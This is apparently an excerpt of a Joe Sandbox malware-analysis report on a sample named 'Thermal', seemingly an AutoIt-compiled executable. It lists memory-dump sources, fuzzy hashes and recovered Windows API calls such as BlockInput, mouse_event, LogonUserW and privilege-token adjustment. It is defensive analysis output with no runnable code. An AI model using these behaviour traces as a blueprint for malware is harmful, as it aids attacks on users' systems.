                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                • String ID:
                                                • API String ID: 81990902-0
                                                • Opcode ID: dc3ff61da99fc43fd9fae5a1d563dfded989910e59c9442f4c0c80a4ac88b57d
                                                • Instruction ID: 44c3bcabfc635b2cb6a020d89774939e76780435f4c76e0f2fd38067bb971057
                                                • Opcode Fuzzy Hash: dc3ff61da99fc43fd9fae5a1d563dfded989910e59c9442f4c0c80a4ac88b57d
                                                • Instruction Fuzzy Hash: D9E0B676010611EFEB662B65FC19E777BADEB04311B14892DF4AA80470DB76ACA0DB50
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00798F87,?,?,?,00000001), ref: 0079A38A
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0079A393
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: 061bbd7794092d9b8583d4e1d05557f46d0c14fba4f7fd6b4f0f5a41a4e018cd
                                                • Instruction ID: f5637d81f21d1845542d3e984b2fe6bfcbc6f2e2ef5697a2b0732f8f51a67e8a
                                                • Opcode Fuzzy Hash: 061bbd7794092d9b8583d4e1d05557f46d0c14fba4f7fd6b4f0f5a41a4e018cd
                                                • Instruction Fuzzy Hash: 8BB09231065208ABCA822BD1EC09B883F68FB45A62F014010F60D44260CB6254508E91
                                                APIs
                                                • BlockInput.USER32(00000001), ref: 007E45F0
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: BlockInput
                                                • String ID:
                                                • API String ID: 3456056419-0
                                                • Opcode ID: 953ff26e68b606f9352ac3e1c08b91d110483894855fd4ba45f7f61f11dfa70f
                                                • Instruction ID: 8b7492e3c66c95ce5156e7bd3bff0d04c3e9d9ee77aedbf15dda1ede33b97424
                                                • Opcode Fuzzy Hash: 953ff26e68b606f9352ac3e1c08b91d110483894855fd4ba45f7f61f11dfa70f
                                                • Instruction Fuzzy Hash: E7E0DF312002099FC710AF6AE804A8AF7E8AF987A0F00C016FC49C7310DBB4EC10CB90
                                                APIs
                                                • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 007D5205
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: mouse_event
                                                • String ID:
                                                • API String ID: 2434400541-0
                                                • Opcode ID: f3cba4f7cc38f62da89713f13d590e585e11bbad55ccb57a3e3b7d6f98c555ad
                                                • Instruction ID: 731af3932b92695dfb3b17e259579c30caedfd06b47e60b9a6625845bb19f86f
                                                • Opcode Fuzzy Hash: f3cba4f7cc38f62da89713f13d590e585e11bbad55ccb57a3e3b7d6f98c555ad
                                                • Instruction Fuzzy Hash: 45D092A6160E0EBBED5807249E1FF761628F3017C1F94468B7342992C2ECDEA885A831
                                                APIs
                                                • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,007C8FA7), ref: 007C9389
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: LogonUser
                                                • String ID:
                                                • API String ID: 1244722697-0
                                                • Opcode ID: ea1a3c9bc1e9ce8dcb363471d3d40c315f23621c534f888291618cf3946a6772
                                                • Instruction ID: c81afaaacd9f0b35017b8b6aa7d9427d3cb634a66fdbc4b303db7b78977f6c4f
                                                • Opcode Fuzzy Hash: ea1a3c9bc1e9ce8dcb363471d3d40c315f23621c534f888291618cf3946a6772
                                                • Instruction Fuzzy Hash: EDD05E3226090EABEF018EA4DC01EAF3B69EB04B01F408111FE15C50A0C775D835AF60
                                                APIs
                                                • GetUserNameW.ADVAPI32(?,?), ref: 007B0734
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: NameUser
                                                • String ID:
                                                • API String ID: 2645101109-0
                                                • Opcode ID: ad94b758054ce6f4be5f46d41e371b2680496015516d9e9a49d4488d4fd3b6ec
                                                • Instruction ID: 518e63d414dcb6f73a6d37bc3bdae04cda89082987236895af16791eda4d63d2
                                                • Opcode Fuzzy Hash: ad94b758054ce6f4be5f46d41e371b2680496015516d9e9a49d4488d4fd3b6ec
                                                • Instruction Fuzzy Hash: CBC04CF1800109DBDB05DBA0D988FEF77BCBB04304F104055A105B2100D7789B448E71
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0079A35A
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: 582b41471048701c91109fd0526ccdbc9cf9f622b414d2afcd9faac81fea7543
                                                • Instruction ID: 8c64508e539461ca078b036aa156b3e165d08f72d28ab8d1efb7e09472980c35
                                                • Opcode Fuzzy Hash: 582b41471048701c91109fd0526ccdbc9cf9f622b414d2afcd9faac81fea7543
                                                • Instruction Fuzzy Hash: BAA0113002020CABCA022B82EC08888BFACEA002A0B008020F80C002228B32A8208A80
                                                APIs
                                                • CharUpperBuffW.USER32(?,?,00800980), ref: 007F3C65
                                                • IsWindowVisible.USER32(?), ref: 007F3C89
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: BuffCharUpperVisibleWindow
                                                • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                • API String ID: 4105515805-45149045
                                                • Opcode ID: 16430bc55123bd6e982645dc52cdbc1ace80f9d02d97383e05f0ef1a22504fa8
                                                • Instruction ID: 1532c7b52bb221a6c42781a918de342d59111ee2d28033508f797a7e8afdacf3
                                                • Opcode Fuzzy Hash: 16430bc55123bd6e982645dc52cdbc1ace80f9d02d97383e05f0ef1a22504fa8
                                                • Instruction Fuzzy Hash: 8DD17D30204218DFCB14EF60D459A7EB7A1EF94344F10845CFA965B3A2CB39ED8ACB91
                                                APIs
                                                • SetTextColor.GDI32(?,00000000), ref: 007FAC55
                                                • GetSysColorBrush.USER32(0000000F), ref: 007FAC86
                                                • GetSysColor.USER32(0000000F), ref: 007FAC92
                                                • SetBkColor.GDI32(?,000000FF), ref: 007FACAC
                                                • SelectObject.GDI32(?,?), ref: 007FACBB
                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 007FACE6
                                                • GetSysColor.USER32(00000010), ref: 007FACEE
                                                • CreateSolidBrush.GDI32(00000000), ref: 007FACF5
                                                • FrameRect.USER32(?,?,00000000), ref: 007FAD04
                                                • DeleteObject.GDI32(00000000), ref: 007FAD0B
                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 007FAD56
                                                • FillRect.USER32(?,?,?), ref: 007FAD88
                                                • GetWindowLongW.USER32(?,000000F0), ref: 007FADB3
                                                  • Part of subcall function 007FAF18: GetSysColor.USER32(00000012), ref: 007FAF51
                                                  • Part of subcall function 007FAF18: SetTextColor.GDI32(?,?), ref: 007FAF55
                                                  • Part of subcall function 007FAF18: GetSysColorBrush.USER32(0000000F), ref: 007FAF6B
                                                  • Part of subcall function 007FAF18: GetSysColor.USER32(0000000F), ref: 007FAF76
                                                  • Part of subcall function 007FAF18: GetSysColor.USER32(00000011), ref: 007FAF93
                                                  • Part of subcall function 007FAF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 007FAFA1
                                                  • Part of subcall function 007FAF18: SelectObject.GDI32(?,00000000), ref: 007FAFB2
                                                  • Part of subcall function 007FAF18: SetBkColor.GDI32(?,00000000), ref: 007FAFBB
                                                  • Part of subcall function 007FAF18: SelectObject.GDI32(?,?), ref: 007FAFC8
                                                  • Part of subcall function 007FAF18: InflateRect.USER32(?,000000FF,000000FF), ref: 007FAFE7
                                                  • Part of subcall function 007FAF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007FAFFE
                                                  • Part of subcall function 007FAF18: GetWindowLongW.USER32(00000000,000000F0), ref: 007FB013
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                • String ID:
                                                • API String ID: 4124339563-0
                                                • Opcode ID: 98648c516fc197bc27652eee594032c7e95fcc7fe10917f5b8c8c542fb7a63c1
                                                • Instruction ID: 3afa7246bf0925d89c1d4f4405aaacd94b5464896a880cd05eb47fdad10e3d75
                                                • Opcode Fuzzy Hash: 98648c516fc197bc27652eee594032c7e95fcc7fe10917f5b8c8c542fb7a63c1
                                                • Instruction Fuzzy Hash: B7A19CB2108305BFD7519F64DC08F6B7BA9FF89321F104A19FA66A62A0DB35D840CF52
                                                APIs
                                                • DestroyWindow.USER32(?,?,?), ref: 00773072
                                                • DeleteObject.GDI32(00000000), ref: 007730B8
                                                • DeleteObject.GDI32(00000000), ref: 007730C3
                                                • DestroyIcon.USER32(00000000,?,?,?), ref: 007730CE
                                                • DestroyWindow.USER32(00000000,?,?,?), ref: 007730D9
                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 007AC77C
                                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 007AC7B5
                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 007ACBDE
                                                  • Part of subcall function 00771F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00772412,?,00000000,?,?,?,?,00771AA7,00000000,?), ref: 00771F76
                                                • SendMessageW.USER32(?,00001053), ref: 007ACC1B
                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 007ACC32
                                                • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 007ACC48
                                                • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 007ACC53
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                • String ID: 0
                                                • API String ID: 464785882-4108050209
                                                • Opcode ID: e9fc2afe383de359004fa94b203dcc368dfaa3442aeaeb0b28a0092753cd29ac
                                                • Instruction ID: 01b7eca69ebe358a92e30a1d1e9670ec3d3142089a264d3e7a43c3b75dbdbbec
                                                • Opcode Fuzzy Hash: e9fc2afe383de359004fa94b203dcc368dfaa3442aeaeb0b28a0092753cd29ac
                                                • Instruction Fuzzy Hash: EF12BE30604201EFDB26CF24C888BA9B7E5BF85351F148669F599CB262C739EC41DF91
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                • API String ID: 2660009612-1645009161
                                                • Opcode ID: 8d3493788777352d6d8d75704fe2fb5fe39fa04c5339d0fe459bfb0a0d8719fb
                                                • Instruction ID: 46902a686d92d510bd23c217a7e3a9aaacc05262f513c6a7f65adad707297684
                                                • Opcode Fuzzy Hash: 8d3493788777352d6d8d75704fe2fb5fe39fa04c5339d0fe459bfb0a0d8719fb
                                                • Instruction Fuzzy Hash: 9FA18130A40209EBCF14BF61DC5AFAE7BA9BF44740F140029F815AB293DB79AE52D750
                                                APIs
                                                • DestroyWindow.USER32(00000000), ref: 007E7BC8
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 007E7C87
                                                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 007E7CC5
                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 007E7CD7
                                                • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 007E7D1D
                                                • GetClientRect.USER32(00000000,?), ref: 007E7D29
                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 007E7D6D
                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 007E7D7C
                                                • GetStockObject.GDI32(00000011), ref: 007E7D8C
                                                • SelectObject.GDI32(00000000,00000000), ref: 007E7D90
                                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 007E7DA0
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007E7DA9
                                                • DeleteDC.GDI32(00000000), ref: 007E7DB2
                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007E7DDE
                                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 007E7DF5
                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 007E7E30
                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 007E7E44
                                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 007E7E55
                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 007E7E85
                                                • GetStockObject.GDI32(00000011), ref: 007E7E90
                                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007E7E9B
                                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 007E7EA5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                • API String ID: 2910397461-517079104
                                                • Opcode ID: d6cd6d7f201a3e9e171238e307c8d9c1ab47e2364961f8476ff3c13709932ffc
                                                • Instruction ID: 3a27dc35a54d5857f23e8ed853d287538a8ffecad4e79cde47925006b2cf279a
                                                • Opcode Fuzzy Hash: d6cd6d7f201a3e9e171238e307c8d9c1ab47e2364961f8476ff3c13709932ffc
                                                • Instruction Fuzzy Hash: 61A160B1A40619BFEB14DB64DC4AFAB7BA9FB49710F108114FA15A72E0D774AD01CF60
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 007DB361
                                                • GetDriveTypeW.KERNEL32(?,00802C4C,?,\\.\,00800980), ref: 007DB43E
                                                • SetErrorMode.KERNEL32(00000000,00802C4C,?,\\.\,00800980), ref: 007DB59C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ErrorMode$DriveType
                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                • API String ID: 2907320926-4222207086
                                                • Opcode ID: 29fd4358f09b3cc4327ac38874297f03396e445e5df2a3ae9a655ab4a845e485
                                                • Instruction ID: 9d3311a6e13bc5688d634cfa4ece6a80152fb1ea55635362f525f53d9d9bbd5f
                                                • Opcode Fuzzy Hash: 29fd4358f09b3cc4327ac38874297f03396e445e5df2a3ae9a655ab4a845e485
                                                • Instruction Fuzzy Hash: 2E519E30B41209EBCB00EB20E946A7C77B0FB44740B29812BE457E7391DB7DAE91DB51
                                                APIs
                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 007FA0F7
                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 007FA1B0
                                                • SendMessageW.USER32(?,00001102,00000002,?), ref: 007FA1CC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window
                                                • String ID: 0
                                                • API String ID: 2326795674-4108050209
                                                • Opcode ID: ee10aa6eff08bc650dccec53541340480ec0ae065ea03ab690bfc14f3bd9c219
                                                • Instruction ID: 74d32c4cb40b7e08b6db649f2ab123151ece79ebf392fbf15db768c01846b4f8
                                                • Opcode Fuzzy Hash: ee10aa6eff08bc650dccec53541340480ec0ae065ea03ab690bfc14f3bd9c219
                                                • Instruction Fuzzy Hash: E202DDB0208309BFDB258F18C848BBABBE5FF85314F048519FA99963A1C779D854CF52
                                                APIs
                                                • GetSysColor.USER32(00000012), ref: 007FAF51
                                                • SetTextColor.GDI32(?,?), ref: 007FAF55
                                                • GetSysColorBrush.USER32(0000000F), ref: 007FAF6B
                                                • GetSysColor.USER32(0000000F), ref: 007FAF76
                                                • CreateSolidBrush.GDI32(?), ref: 007FAF7B
                                                • GetSysColor.USER32(00000011), ref: 007FAF93
                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 007FAFA1
                                                • SelectObject.GDI32(?,00000000), ref: 007FAFB2
                                                • SetBkColor.GDI32(?,00000000), ref: 007FAFBB
                                                • SelectObject.GDI32(?,?), ref: 007FAFC8
                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 007FAFE7
                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007FAFFE
                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 007FB013
                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007FB05F
                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 007FB086
                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 007FB0A4
                                                • DrawFocusRect.USER32(?,?), ref: 007FB0AF
                                                • GetSysColor.USER32(00000011), ref: 007FB0BD
                                                • SetTextColor.GDI32(?,00000000), ref: 007FB0C5
                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 007FB0D9
                                                • SelectObject.GDI32(?,007FAC1F), ref: 007FB0F0
                                                • DeleteObject.GDI32(?), ref: 007FB0FB
                                                • SelectObject.GDI32(?,?), ref: 007FB101
                                                • DeleteObject.GDI32(?), ref: 007FB106
                                                • SetTextColor.GDI32(?,?), ref: 007FB10C
                                                • SetBkColor.GDI32(?,?), ref: 007FB116
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
